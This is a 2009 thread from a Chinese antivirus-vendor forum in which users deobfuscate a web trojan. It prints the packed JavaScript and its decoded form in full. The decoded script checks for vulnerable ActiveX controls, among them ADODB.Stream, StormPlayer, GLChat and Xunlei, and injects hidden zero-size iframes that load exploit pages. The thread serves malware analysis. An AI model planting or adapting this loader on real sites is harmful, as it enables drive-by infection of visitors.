瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 关于一个网页木马解密的分析
dby107 - 2009-11-25 0:59:00



<script language="javaScript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):
c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\
w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('G I(){3.5()}j{4 e;4 p=(3.F("c")
);p.B("A","C:E-D-J-K-H");4 r=p.s("q.x","")}k(e){};l{i(e!="[c d]"){3.5("<2 7=0 6=0 a=y.9 8=0></2>")}j{4 f;4 z=n o("w.t")}
k(f){};l{i(f!="[c d]"){3.5("<2 7=0 6=0 a=u.9 8=0></2>")}}j{4 g;4 m=n o("v.L.1")}k(g){};l{i(g!="[c d]"){3.5("<2 7=0 6=0 a
=m.9 8=0></2>")}}j{4 h;4 m=n o("10.Y.1")}k(h){};l{i(h!="[c d]"){3.5("<2 7=0 6=0 a=Z.9 8=0></2>");3.5("<2 7=0 6=0
a=13.9 8=0></2>")}}j{4 b;4 m=n o("12")}k(b){};l{i(b!="[c d]"){3.5("<2 7=0 6=0 a=11.9 8=0></2>")}}j{4 b;4 m=n o("X.
P")}k(b){};l{i(b!="[c d]"){3.5("<2 7=0 6=0 a=Q.9 8=0></2>")}}j{4 b;4 m=n o("O.M")}k(b){};l{i(b!="[c d]"){3.5("<2 7=0 6
=0 a=N.9 8=0></2>")}}3.5("<2 7=0 6=0 a=R.9 8=0></2>");3.5("<2 7=0 6=0 a=V.9 8=0></2>");3.5("<2 7=0 6=0 a=
W.9 8=0></2>");3.5("<2 7=0 6=0 a=U.9 8=0></2>");3.5("<2 7=0 6=0 a=S.9 8=0></2>");3.5("<2 7=0 6=0 a=T.9 8=
0></2>")}',62,66,'||iframe|document|var|write|height|width|frameborder|htm|src|ii|object|Error|||||if|try|catch|finally|p
ps|new|ActiveXObject|ado|Adodb|as|createobject|StormPlayer|yyfb|POWERPLAYER|MPS|Stream|06014|storm|cl
assid|setAttribute|clsid|65A3|BD96C556|createElement|function|00C04FC29E36|init|11D0|983A|PowerPlayerCtrl|
WcUpload|yahoo|YWcUpl|Vod|xunlei5|realplay|0733|baidu|07004|IENoRun|xunlei|DPClient|GLChatCtrl|lz_new|G
LCHAT|cx|Pdg2|lz'.split('|'),0,{}))
</script>


这是一个Eval加密的网页木马,我的问题是我把开头的eval已经替换了alert,但怎么运行没反应啊?

别人用alert一下就解了,我怎么就不行,纳闷。要他告诉一下怎么弄的也不肯,烦。。。。

各位大侠帮我解一下密吧,顺便把方法提供一下(详细一点的)。


PS:木马地址已过期或不存在了,请放心测试。。。。

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
networkedition - 2009-11-25 9:11:00
代码不全吧,解密方法掌握即可。
dby107 - 2009-11-25 12:06:00
代码是全的啊,别人都可以解啊,好像用火胡解的
shadowmin - 2009-11-25 12:12:00
function init()
{
  document.write()
}
try
{
  var e;
  var ado=(document.createElement("object"));
  ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
  var as=ado.createobject("Adodb.Stream","")
}
catch(e)
{
};
finally
{
  if(e!="[object Error]")
  {
    document.write("<iframe width=0 height=0 src=06014.htm frameborder=0></iframe>")
  }
  try
  {
    var f;
    var storm=new ActiveXObject("MPS.StormPlayer")
  }
  catch(f)
  {
  };
  finally
  {
    if(f!="[object Error]")
    {
      document.write("<iframe width=0 height=0 src=yyfb.htm frameborder=0></iframe>")
    }
  }
  try
  {
    var g;
    var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1")
  }
  catch(g)
  {
  };
  finally
  {
    if(g!="[object Error]")
    {
      document.write("<iframe width=0 height=0 src=pps.htm frameborder=0></iframe>")
    }
  }
  try
  {
    var h;
    var pps=new ActiveXObject("GLCHAT.GLChatCtrl.1")
  }
  catch(h)
  {
  };
  finally
  {
    if(h!="[object Error]")
    {
      document.write("<iframe width=0 height=0 src=lz_new.htm frameborder=0></iframe>");
      document.write("<iframe width=0 height=0 src=lz.htm frameborder=0></iframe>")
    }
  }
  try
  {
    var ii;
    var pps=new ActiveXObject("Pdg2")
  }
  catch(ii)
  {
  };
  finally
  {
    if(ii!="[object Error]")
    {
      document.write("<iframe width=0 height=0 src=cx.htm frameborder=0></iframe>")
    }
  }
  try
  {
    var ii;
    var pps=new ActiveXObject("DPClient.Vod")
  }
  catch(ii)
  {
  };
  finally
  {
    if(ii!="[object Error]")
    {
      document.write("<iframe width=0 height=0 src=xunlei5.htm frameborder=0></iframe>")
    }
  }
  try
  {
    var ii;
    var pps=new ActiveXObject("YWcUpl.WcUpload")
  }
  catch(ii)
  {
  };
  finally
  {
    if(ii!="[object Error]")
    {
      document.write("<iframe width=0 height=0 src=yahoo.htm frameborder=0></iframe>")
    }
  }
  document.write("<iframe width=0 height=0 src=realplay.htm frameborder=0></iframe>");
  document.write("<iframe width=0 height=0 src=IENoRun.htm frameborder=0></iframe>");
  document.write("<iframe width=0 height=0 src=xunlei.htm frameborder=0></iframe>");
  document.write("<iframe width=0 height=0 src=07004.htm frameborder=0></iframe>");
  document.write("<iframe width=0 height=0 src=0733.htm frameborder=0></iframe>");
document.write("<iframe width=0 height=0 src=baidu.htm frameborder=0></iframe>")}
dby107 - 2009-11-25 12:23:00
恩。就是像LS的一样,就解出来了。。

怎么弄的呢?能否告诉一下啊?
shadowmin - 2009-11-25 13:59:00
把代码拷到神器的解密窗口,然后右键,run script-->remove whitespace,得到整后的代码,你想怎么处理应该都可以了.
dby107 - 2009-11-25 14:44:00
没整明白? 能不能具体一点,神器是什么?

如果是直接用工具解密的话那肯定不行,主要是要方法
networkedition - 2009-11-25 14:55:00
这段代码里有空格,需要使用工具删除空格就可以正常解密了。
用神器、redoce等工具都可以删除空格,处理后的代码就可以使用你提到方法来进行解密。
dby107 - 2009-11-25 15:25:00
哦,谢谢了,已经明白了。呵呵:kaka12:
1
查看完整版本: 关于一个网页木马解密的分析